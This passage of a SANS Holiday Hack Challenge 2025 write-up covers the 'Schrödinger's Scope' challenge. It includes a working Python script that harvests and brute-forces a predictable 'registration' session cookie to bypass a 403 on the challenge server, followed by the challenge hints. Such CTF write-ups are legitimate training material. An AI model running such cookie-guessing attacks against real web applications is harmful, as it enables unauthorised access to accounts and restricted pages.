</span></span><span style="display:flex;"><span>url <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;https://flask-schrodingers-scope-firestore.holidayhackchallenge.com/register/?id=</span><span style="color:#e6db74">{</span>get_param_id<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">with</span> requests<span style="color:#f92672">.</span>Session() <span style="color:#66d9ef">as</span> s:
</span></span><span style="display:flex;"><span>    s<span style="color:#f92672">.</span>cookies<span style="color:#f92672">.</span>set(
</span></span><span style="display:flex;"><span>        name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Schrodinger&#34;</span>,
</span></span><span style="display:flex;"><span>        value <span style="color:#f92672">=</span> schrodinger_token
</span></span><span style="display:flex;"><span>    )    
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    registration_cookies <span style="color:#f92672">=</span> set()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range (<span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">50</span>):
</span></span><span style="display:flex;"><span>        r <span style="color:#f92672">=</span> s<span style="color:#f92672">.</span>get(url)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        registration_cookies<span style="color:#f92672">.</span>add(r<span style="color:#f92672">.</span>cookies<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#34;registration&#34;</span>))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    print(len(registration_cookies))
</span></span><span style="display:flex;"><span>    pprint(registration_cookies)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    min_value <span style="color:#f92672">=</span> min(registration_cookies)
</span></span><span style="display:flex;"><span>    prefix <span style="color:#f92672">=</span> min_value[:<span style="color:#f92672">-</span><span style="color:#ae81ff">2</span>]
</span></span><span style="display:flex;"><span>    start <span style="color:#f92672">=</span> int(min_value[<span style="color:#f92672">-</span><span style="color:#ae81ff">2</span>:], <span style="color:#ae81ff">16</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    candidates <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>prefix<span style="color:#e6db74">}{</span>i<span style="color:#e6db74">:</span><span style="color:#e6db74">02x</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x100</span>)
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    candidates <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(start, start <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x100</span>):
</span></span><span style="display:flex;"><span>        candidates<span style="color:#f92672">.</span>append(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>prefix<span style="color:#e6db74">}{</span>(i <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xff</span>)<span style="color:#e6db74">:</span><span style="color:#e6db74">02x</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    length_candidates <span style="color:#f92672">=</span> len(candidates)
</span></span><span style="display:flex;"><span>    counter <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> candidate <span style="color:#f92672">in</span> candidates:
</span></span><span style="display:flex;"><span>        s<span style="color:#f92672">.</span>cookies<span style="color:#f92672">.</span>set(
</span></span><span style="display:flex;"><span>            name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;registration&#34;</span>,
</span></span><span style="display:flex;"><span>            value <span style="color:#f92672">=</span> candidate
</span></span><span style="display:flex;"><span>        )
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        url <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;https://flask-schrodingers-scope-firestore.holidayhackchallenge.com/register/courses/wip/holiday_behavior?id=</span><span style="color:#e6db74">{</span>get_param_id<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>        r <span style="color:#f92672">=</span> s<span style="color:#f92672">.</span>get(url)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;403 Forbidden&#34;</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text:
</span></span><span style="display:flex;"><span>            print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;[</span><span style="color:#e6db74">{</span>counter<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>length_candidates<span style="color:#e6db74">}</span><span style="color:#e6db74">] Register: </span><span style="color:#e6db74">{</span>candidate<span style="color:#e6db74">}</span><span style="color:#e6db74"> =&gt; NOPE&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>            print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;[</span><span style="color:#e6db74">{</span>counter<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">{</span>length_candidates<span style="color:#e6db74">}</span><span style="color:#e6db74"> ] Register: </span><span style="color:#e6db74">{</span>candidate<span style="color:#e6db74">}</span><span style="color:#e6db74"> =&gt; YES&#34;</span>)
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        counter <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span></span></span></code></pre></div>
<p>The script found the desired cookie value after 11 tries:</p>
<p><a href="#R-image-ca9545e1a3f11e942c22d4e53616c41d" class="lightbox-link"><img alt="Finding the cookie value" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-13.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-ca9545e1a3f11e942c22d4e53616c41d"><img alt="Finding the cookie value" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-13.png"></a></p>
<p>Then I just took this cookie value and edited the &ldquo;registration&rdquo; cookie in my browser and hit refresh:</p>
<p><a href="#R-image-782d170807a72def1efc7295f4b9e0ba" class="lightbox-link"><img alt="Finalizing" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-14.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-782d170807a72def1efc7295f4b9e0ba"><img alt="Finalizing" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-14.png"></a></p>
<p>Finalizing it I were given a nice diploma I could hang behind the refrigerator:</p>
<p><a href="#R-image-0f8803aaed9bc0b6c17e956e849f9f8d" class="lightbox-link"><img alt="A diploma" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-15.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-0f8803aaed9bc0b6c17e956e849f9f8d"><img alt="A diploma" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-15.png"></a></p>
<p>Clear scope definition is a control, not a limitation, in effective penetration testing.</p>
<h2 id="kevin-mcfarland-closing-words">Kevin McFarland closing words</h2>
<p>After solving, Kevin says:</p>
<blockquote>
<p>Well done - you’ve shown the wisdom to stay within scope, uncover what mattered, and respecting other testing boundaries.</p>
<p>That kind of discipline is what separates a real penetration tester from someone just poking around.</p>
</blockquote>
<h2 id="hints">Hints</h2>
<ol>
<li>
<p>Though it might be more interesting to start off trying clever techniques and exploits, always start with the simple stuff first, such as reviewing HTML source code and basic SQLi.</p>
</li>
<li>
<p>Watch out for tiny, pesky gnomes who may be violating your progess. If you find one, figure out how they are getting into things and consider matching and replacing them out of your way.</p>
</li>
<li>
<p>During any kind of penetration test, always be on the lookout for items which may be predictable from the available information, such as application endpoints. Things like a sitemap can be helpful, even if it is old or incomplete. Other predictable values to look for are things like token and cookie values</p>
</li>
<li>
<p>Pay close attention to the instructions and be very wary of advice from the tongues of gnomes! Perhaps not ignore everything, but be careful!</p>
</li>
<li>
<p>As you test this with a tool like Burp Suite, resist temptations and stay true to the instructed path.</p>
</li>
</ol>

  <footer class="footline">
              <i class='fa-fw fas fa-calendar'></i> Dec 23, 2025
  </footer>
</article>
        </div>
      </main>
    </div>
    <aside id="R-sidebar" class="default-animation">
      <div id="R-header-topbar" class="default-animation"></div>
      <div id="R-header-wrapper" class="default-animation">
        <div id="R-header" class="default-animation">
          <a id="R-logo" class="R-default" href="/index.html">
            <div class="logo-title">SANS Holiday Hack Challenge 2025</div>
          </a>
        </div>
      </div>
      <div id="R-homelinks" class="default-animation homelinks">
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-homelinks">
          <ul class="space collapsible-menu">
            <li class="" data-nav-url="/index.html"><a class="padding" href="/index.html"><i class="fa-fw fas fa-home"></i> Home</a></li>
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-headercontrols">
          <ul class="">
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
      </div>
      <div id="R-content-wrapper" class="highlightable">
        <div class="R-sidebarmenu R-shortcutmenu-main">
          <ul class="enlarge morespace collapsible-menu">
            <li class="" data-nav-url="/act1/index.html"><a class="padding" href="/act1/index.html">Act 1</a><ul id="R-subsections-8dc0c36ceefa45529ff4cf1f9bdc1f66" class="collapsible-menu"></ul></li>
            <li class="" data-nav-url="/act2/index.html"><a class="padding" href="/act2/index.html">Act 2</a><ul id="R-subsections-9d3d8c898368693a495088de36411fa6" class="collapsible-menu"></ul></li>
            <li class="parent " data-nav-url="/act3/index.html"><a class="padding" href="/act3/index.html">Act 3</a><ul id="R-subsections-0b6215c9fad834351813cc2ad0d4a335" class="collapsible-menu">
            <li class="" data-nav-url="/act3/gnome-tea/index.html"><a class="padding" href="/act3/gnome-tea/index.html">Gnome Tea</a></li>
            <li class="" data-nav-url="/act3/hack-a-gnome/index.html"><a class="padding" href="/act3/hack-a-gnome/index.html">Hack-a-Gnome</a></li>
            <li class="" data-nav-url="/act3/snowcat-rce-and-priv-esc/index.html"><a class="padding" href="/act3/snowcat-rce-and-priv-esc/index.html">Snowcat RCE &amp; Priv Esc</a></li>
            <li class="active " data-nav-url="/act3/schrodingers-scope/index.html"><a class="padding" href="/act3/schrodingers-scope/index.html">Schrödingers Scope</a></li>
            <li class="" data-nav-url="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html"><a class="padding" href="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html">Find and Shutdown Frostys Snowglobe Machine</a></li>
            <li class="" data-nav-url="/act3/on-the-wire/index.html"><a class="padding" href="/act3/on-the-wire/index.html">On the Wire</a></li>
            <li class="" data-nav-url="/act3/free-ski/index.html"><a class="padding" href="/act3/free-ski/index.html">Free Ski</a></li>
            <li class="" data-nav-url="/act3/snowblind-ambush/index.html"><a class="padding" href="/act3/snowblind-ambush/index.html">Snowblind Ambush</a></li></ul></li>
            <li class="" data-nav-url="/endgame/index.html"><a class="padding" href="/endgame/index.html">Endgame</a></li>
            <li class="" data-nav-url="/about/index.html"><a class="padding" href="/about/index.html">About Roger Johnsen</a></li>
          </ul>
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-shortcuts">
          <ul class="space collapsible-menu">
          </ul>
        </div>
        <div id="R-footer-margin"></div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-footercontrols">
          <ul class="">
          </ul>
        </div>
<div id="R-footer"><p>Built with <a href="https://github.com/McShelby/hugo-theme-relearn" title="love"><i class="fas fa-heart"></i></a> by <a href="https://gohugo.io/">Hugo</a></p></div>
      </div>
    </aside>
    <script src="/js/clipboard/clipboard.min.js?1767538340" defer></script>
    <script src="/js/perfect-scrollbar/perfect-scrollbar.min.js?1767538340" defer></script>
    <script src="/js/theme.js?1767538340" defer></script>
  </body>
</html>
